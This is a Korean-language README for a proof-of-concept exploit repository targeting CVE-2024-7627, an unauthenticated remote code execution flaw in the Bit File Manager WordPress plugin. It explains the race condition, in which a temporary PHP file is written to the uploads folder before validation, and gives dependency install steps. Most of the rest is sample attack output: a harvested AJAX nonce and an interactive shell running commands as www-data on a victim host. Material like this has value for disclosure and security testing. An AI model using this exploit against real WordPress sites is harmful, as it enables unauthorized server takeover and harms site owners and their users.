
CVE-2024-7627에 대한 개념 증명 익스플로잇으로, Bit File Manager WordPress 플러그인의 인증되지 않은 원격 코드 실행 취약점입니다. nonce 추출, 경쟁 조건 악용을 자동화하고 대화형 리버스 셸을 제공합니다.
이 저장소는 Bit File Manager WordPress 플러그인(버전 6.0 – 6.5.5)에서 발견된 치명적인 비인증 원격 코드 실행(RCE) 취약점인 CVE-2024-7627에 대한 개념 증명(PoC) 익스플로잇을 포함합니다.
Guest User Read 기능이 활성화되면 플러그인은 checkSyntax 함수 내부에 레이스 컨디션을 노출합니다.
이 함수는 검증 전에 임시 PHP 파일을 /wp-content/uploads/에 작성하므로, 공격자가 해당 파일을 요청하고 임의의 시스템 명령을 실행할 수 있습니다.
requestsaiohttpasynciobeautifulsoup4의존성 설치:
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data